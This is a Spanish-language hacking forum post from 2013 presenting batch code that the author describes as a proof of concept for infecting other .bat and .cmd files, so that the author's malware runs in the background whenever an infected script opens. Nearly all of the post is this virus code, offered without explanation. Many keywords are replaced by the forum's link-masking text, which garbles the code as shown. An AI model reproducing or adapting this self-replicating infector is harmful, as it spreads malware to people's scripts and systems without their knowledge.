¿Infección en batch?

  • 0 Respuestas
  • 4355 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado binary_death

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

¿Infección en batch?

  • en: Septiembre 03, 2013, 06:06:39 pm
Código: DOS
  1. @:_v_main
  2. @You are not allowed to view links. Register or Login Off %v_main%
  3. You are not allowed to view links. Register or Login /f "Tokens=* Delims=" %%i You are not allowed to view links. Register or Login ( %v_main%
  4.    'You are not allowed to view links. Register or Login/b *.BAT *.CMD' %v_main%
  5. ) You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login:_Infect "%%~i" "%~0" %v_main%
  6. You are not allowed to view links. Register or Login/B 0 %v_main%
  7. :_Infect %v_main%
  8. Find "@::i_b_t"<"%~1">You are not allowed to view links. Register or Login && You are not allowed to view links. Register or Login:EoF %v_main%
  9. You are not allowed to view links. Register or Login /f "Tokens=1 Delims=" %%_ You are not allowed to view links. Register or Login ( %v_main%
  10.    'Type "%~1"^|find /v /c ""^<"%~1"'%v_main%
  11. ) You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login/A "beg_rg=%%_+1" & You are not allowed to view links. Register or Login/A "end_rg=%%_+6" %v_main%
  12. ( %v_main%
  13.    You are not allowed to view links. Register or Login. %v_main%
  14.    You are not allowed to view links. Register or Login.@::i_b_t %v_main%
  15.    You are not allowed to view links. Register or Login.@You are not allowed to view links. Register or Login "Str_R=v_ma" %v_main%
  16.    You are not allowed to view links. Register or Login.@You are not allowed to view links. Register or Login:_%%~1 %v_main%
  17.    You are not allowed to view links. Register or Login.:_ %v_main%
  18.    You are not allowed to view links. Register or Login.@Start "" /B /high "%%~0" %%Str_R%%You are not allowed to view links. Register or Login %v_main%
  19. ) >> "%~1" %v_main%
  20. ( %v_main%
  21.    You are not allowed to view links. Register or Login.%beg_rg%,%end_rg%,1M %v_main%
  22.    You are not allowed to view links. Register or Login.E %v_main%
  23. )|Edlin /B %~1 %v_main%
  24. Find "v_main"<"%~2">>"%~1" %v_main%
  25. You are not allowed to view links. Register or Login:EoF %v_main%
  26.  

No voy a dar explicaciones. Nada más decir que es una prueba de concepto de cómo infectar otros ficheros .bat y que al abrirlos, se ejecute nuestro malware pero sin interrumpir la ejecución del bat original ni un segundo  :P
« Última modificación: Abril 03, 2015, 12:10:36 am por fermino »

 

""MSN"" en batch

Iniciado por Elle Lawliet

Respuestas: 6
Vistas: 4804
Último mensaje Julio 18, 2011, 01:35:47 am
por JaAViEr
[Código-Batch] Usuarios del PC & Procesos Ejecución - WMIC - JaAViEr

Iniciado por JaAViEr

Respuestas: 0
Vistas: 2377
Último mensaje Julio 17, 2011, 05:21:18 am
por JaAViEr
Detecta Autorun.Inf + Eliminación de Archivo Infectado - JaAViEr - Batch

Iniciado por JaAViEr

Respuestas: 4
Vistas: 4050
Último mensaje Julio 18, 2011, 06:36:47 pm
por LucaSthefano
[Código-Batch] Consola de Comandos Versión Arcoiris - JaAViEr

Iniciado por JaAViEr

Respuestas: 0
Vistas: 2735
Último mensaje Julio 17, 2011, 05:29:39 am
por JaAViEr
[BATCH] Binder de archivos con Copy /b (tool esteganografia)

Iniciado por 79137913

Respuestas: 1
Vistas: 4925
Último mensaje Mayo 28, 2018, 04:09:26 pm
por Aincrad